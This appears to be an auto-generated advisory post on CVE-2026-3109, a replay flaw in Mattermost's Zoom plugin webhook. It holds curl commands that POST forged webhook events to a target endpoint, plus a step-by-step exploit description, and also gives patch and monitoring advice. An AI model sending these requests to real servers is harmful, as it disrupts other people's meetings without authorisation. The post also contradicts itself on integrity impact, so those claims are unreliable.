Mattermost Plugins, Missing Timestamp Validation (CVE-2026-3109) (Low) -DC-Jun2026-251

By /

Listen to this Post

CVE-2026-3109: Intro

CVE-2026-3109 is a low‑severity vulnerability affecting Mattermost Plugins versions 11.4 and earlier, as well as 10.11.11.0 and earlier. The root cause lies in the Zoom webhook handler, where incoming requests are not checked for a valid, recent timestamp. As a result, an attacker can capture a legitimate Zoom webhook request and replay it later. Because the plugin does not verify the request’s freshness, each replayed request is accepted as valid, allowing the attacker to repeatedly manipulate the state of a Zoom meeting integrated into Mattermost. This can lead to unauthorized configuration changes or the disabling of meetings. The weakness is classified as CWE-754 (Improper Check for Unusual or Exceptional Conditions). The CVSS 3.1 vector is CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L, giving a base score of 2.2 (Low). Attack complexity is high, and privileges are required, but no user interaction is needed. Exploitation would typically involve sending replayed webhook requests to the vulnerable Mattermost instance over the Internet via the Zoom API. While the direct impact per meeting is limited, the ability to repeatedly manipulate meeting state poses a moderate operational risk. The CVE was published on March 26, 2026, and the Mattermost advisory ID is MMSA-2026-00584. The public disclosure of the CVE was made by a researcher identified as “thecybertantrik”. Mattermost has released patches in versions 11.5.0 and 10.11.12, which enforce timestamp validation for Zoom webhook calls.

DailyCVE Form

Platform: Mattermost Plugins
Version: ≤11.4/10.11.11.0
Vulnerability: Replay Attack
Severity: Low
Date: 2026-03-26

Prediction: 2026-03-26

What Undercode Say

Identify vulnerable plugin version
curl -s http://target-mattermost.com/api/v4/plugins | jq '.[] | select(.id | contains("zoom")) | .manifest.version'
Check if plugin validates timestamps (no validation = vulnerable)
grep -r "X-Zoom-Request-Timestamp" /path/to/plugin/
Simulate a replayed webhook request (capture a valid Zoom webhook)
curl -X POST http://target-mattermost.com/plugins/zoom/webhook \
-H "Content-Type: application/json" \
-d '{"event":"meeting.participant_joined","payload":{"account_id":"xyz"}}'
Replay the captured request immediately
curl -X POST http://target-mattermost.com/plugins/zoom/webhook \
-H "Content-Type: application/json" \
-d '{"event":"meeting.participant_joined","payload":{"account_id":"xyz"}}'

Exploit

  1. An attacker with network access to a vulnerable Mattermost instance (<11.5.0 or <10.11.12) intercepts a legitimate Zoom webhook request directed at the `/plugins/zoom/webhook` endpoint.
  2. The attacker captures the exact request payload and headers.
  3. Because the plugin does not check the request’s timestamp, the attacker can immediately replay the captured request.
  4. Each replayed request is accepted as valid, causing the associated Zoom meeting state (e.g., participant list, recording status) to be repeatedly updated.
  5. The attacker can corrupt or disable meeting functions by replaying requests that contain meeting‑altering commands (e.g., meeting.ended).

Protection

  • Upgrade immediately to Mattermost Plugins version 11.5.0, 10.11.12, or higher.
  • If upgrading is not possible, disable the Zoom plugin or block access to the `/plugins/zoom/webhook` endpoint from untrusted networks.
  • Monitor logs for repeated identical webhook requests to the Zoom endpoint, which may indicate replay attacks.
  • Use API gateways or WAFs with request‑replay detection and timestamp‑based policies.

Impact

  • Confidentiality: None – the vulnerability does not expose data.
  • Integrity: None – the replayed requests do not alter data.
  • Availability: Low – replay attacks can temporarily corrupt Zoom meeting state or disable meetings, but do not crash the system.
  • Operational risk: Moderate, due to the ability to repeatedly disrupt integrated Zoom meetings.
  • EPSS score: 0.02% (very low exploit probability in the next 30 days).

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top